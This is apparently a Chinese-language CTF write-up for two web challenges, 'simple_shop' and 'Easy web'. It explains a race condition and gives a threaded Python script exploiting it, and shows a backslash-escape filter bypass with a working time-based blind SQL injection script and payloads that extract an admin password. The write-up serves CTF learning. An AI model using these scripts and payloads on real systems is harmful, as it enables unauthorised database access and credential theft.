simple_shop
web中的条件竞争漏洞:
线程编程中,为了保证数据操作的一致性,操作系统引入了锁机制,用于保证临界区代码的安全。通过锁机制,能够保证在多核多线程环境中,在某一个时间点上,只能有一个线程进入临界区代码,从而保证临界区中操作数据的一致性。
临界区指的是一个访问共用资源(例如:共用设备或是共用存储器)的程序片段,而这些共用资源又无法同时被多个线程访问的特性。
竞争条件发生在多个线程同时访问同一个共享代码、变量、文件等没有进行锁操作或者同步操作的场景中。
御剑扫一下发现备份源码,关键部分如下:
if ($_POST['money']){
$money = intval($_POST['money']);
if($money<0)
{
echo "";
exit();
}
if($money <= $rest) {
$sql = "UPDATE account SET rest=rest-".$money;
$db->query($sql);
$sql = "UPDATE account SET own=own+".$money;
$db->query($sql);
echo "";
} else {
echo "";
}
$sql="select own from account";
$banner = intval($db->query($sql)->fetch_assoc()['own']);
if($own>=21)
{
echo "等等..竟然!无中生友,你怕不是黑黑黑...\nACTF{************}";
}
}多线程脚本:
import requests
import threading
import queue
url = "http://47.112.16.34:22255/index.php"
threads = 20
q = queue.Queue()
for i in range(50):
q.put(i)
def post():
while not q.empty():
q.get()
r = requests.post(url, data={'money': 1})
print(r.text)
if __name__ == '__main__':
for i in range(threads):
t = threading.Thread(target=post)
t.start()
for i in range(threads):
t.join() Easy web
御剑扫一下出来个robot.txt和image.php
不允许爬虫访问*.php.bak,试试image.php.bak,发现备份下载
$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);试了试没有错误回显,猜是时间盲注,嫖了斌斌的脚本:
# insert into member(`username`,pw,sex,phonenum,email,address) values('wangwu',md5('a'),'a','aa','a','a')
import requests
import time
url = "http://47.106.94.13:40005/image.php?"
#params = "id=\\0&path= or if((ascii(mid((select group_concat(column_name) from information_schema.columns where table_name=0x7573657273),{},1))={}),sleep(5),1)--+"
params = "id=\\0&path= or if((ascii(mid((select password from users where username=0x61646d696e),{},1))={}),sleep(5),1)--+"
string = "1234567890abcdefghijklmnopqrstuvwxyz -ABCDEFGHIJKLMNOPQRSTUVWXYZ:_@,\{\}."
while True:
#payload = "if((ascii(mid((select group_concat(database()) ),{},1))={}),sleep(4),1))#"
#payload = "if((ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))={}),sleep(4),1)"
#payload = "if((ascii(mid((select group_concat(column_name) from information_schema.columns where table_name='Look_here'),{},1))={}),sleep(4),1)"
#payload = "if((ascii(mid((select * from Look_here limit 1),{},1))={}),sleep(4),1)"
get = ""
for i in range(1,100):
for j in string:
parm = params.format(str(i),str(ord(j)))
url2 = url + parm
try:
response = requests.get(url2,timeout=3)
except:
get+=j
print(get)
time.sleep(1)
break
#print(url2)
出来密码596c3f5fcccfdfef231c,登录成功,后面暂时还没搞出来,先占个坑叭(›´ω`‹ )